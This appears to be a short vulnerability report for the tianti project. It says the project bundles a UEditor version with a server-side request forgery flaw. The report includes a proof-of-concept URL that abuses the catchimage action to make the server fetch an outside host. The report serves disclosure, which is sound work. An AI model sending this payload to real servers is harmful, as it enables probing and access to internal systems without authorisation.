# Summary UEditor has an SSRF vulnerability, and this project is using the vulnerable version in <=2.3.0. # POC ``` http://127.0.0.1:8080/tianti-module-admin/ueditor/controller.jsp?action=catchimage&source%5b%5d=http://d46ee8bf07.ipv6.bypass.eu.org ``` <img width="1280" height="263" alt="Image" src="https://github.com/user-attachments/assets/66c5a3b1-9a8c-4bbd-8627-2d14f9265e19" />